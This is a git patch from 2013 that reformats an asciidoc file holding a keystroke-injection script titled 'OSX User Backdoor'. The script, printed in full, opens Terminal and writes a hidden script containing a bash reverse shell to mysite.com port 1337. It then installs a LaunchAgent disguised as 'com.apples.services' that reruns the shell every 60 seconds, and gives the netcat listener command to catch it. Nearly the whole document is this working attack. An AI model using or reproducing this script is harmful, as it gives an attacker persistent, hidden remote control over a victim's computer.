From 064a583f0e80e79c57fd0813a334c7dad46f333b Mon Sep 17 00:00:00 2001
From: Patrick Mosca
Date: Tue, 25 Jun 2013 18:25:51 -0700
Subject: [PATCH] Updated OSX User Backdoor (asciidoc)
---
OSX-User-Backdoor.asciidoc | 140 ++++++++++++++++++-------------------
1 file changed, 70 insertions(+), 70 deletions(-)
diff --git a/OSX-User-Backdoor.asciidoc b/OSX-User-Backdoor.asciidoc
index e44b655..8cbc91e 100644
--- a/OSX-User-Backdoor.asciidoc
+++ b/OSX-User-Backdoor.asciidoc
@@ -4,76 +4,76 @@ REM Patrick Mosca -REM A simple script for creating a persistent backdoor on OSX. -REM Change mysite.com to your domain name or IP address -REM Change 1337 to your port number -REM Catch the shell with 'nc -l -p 1337' -REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ -DELAY 1000 -GUI SPACE -STRING terminal -DELAY 500 -ENTER -DELAY 500 -STRING mkdir ~/Library/.hidden -ENTER -DELAY 200 -STRING echo '#!/bin/bash -ENTER -STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 -ENTER -STRING wait' > ~/Library/.hidden/connect.sh -ENTER -DELAY 500 -STRING chmod +x ~/Library/.hidden/connect.sh -ENTER -DELAY 200 -STRING mkdir ~/Library/LaunchAgents -ENTER -DELAY 200 -STRING echo ' -ENTER -STRING -ENTER -STRING Label -ENTER -STRING com.apples.services -ENTER -STRING ProgramArguments -ENTER -STRING -ENTER -STRING /bin/sh -ENTER -STRING '$HOME'/Library/.hidden/connect.sh -ENTER -STRING -ENTER -STRING RunAtLoad -ENTER -STRING -ENTER -STRING StartInterval -ENTER -STRING 60 -ENTER -STRING AbandonProcessGroup -ENTER -STRING -ENTER -STRING -ENTER -STRING ' > ~/Library/LaunchAgents/com.apples.services.plist -ENTER -DELAY 200 -STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist -ENTER -DELAY 200 -STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist -ENTER -DELAY 200 -GUI q - + REM A simple script for creating a persistent backdoor on OSX. 
+ REM Change mysite.com to your domain name or IP address + REM Change 1337 to your port number + REM Catch the shell with 'nc -l -p 1337' + REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ + DELAY 1000 + GUI SPACE + STRING terminal + DELAY 500 + ENTER + DELAY 500 + STRING mkdir ~/Library/.hidden + ENTER + DELAY 200 + STRING echo '#!/bin/bash + ENTER + STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 + ENTER + STRING wait' > ~/Library/.hidden/connect.sh + ENTER + DELAY 500 + STRING chmod +x ~/Library/.hidden/connect.sh + ENTER + DELAY 200 + STRING mkdir ~/Library/LaunchAgents + ENTER + DELAY 200 + STRING echo ' + ENTER + STRING + ENTER + STRING Label + ENTER + STRING com.apples.services + ENTER + STRING ProgramArguments + ENTER + STRING + ENTER + STRING /bin/sh + ENTER + STRING '$HOME'/Library/.hidden/connect.sh + ENTER + STRING + ENTER + STRING RunAtLoad + ENTER + STRING + ENTER + STRING StartInterval + ENTER + STRING 60 + ENTER + STRING AbandonProcessGroup + ENTER + STRING + ENTER + STRING + ENTER + STRING ' > ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist + ENTER + DELAY 200 + GUI q + Catch the shell with netcat: nc -l -p 1337 \ No newline at end of file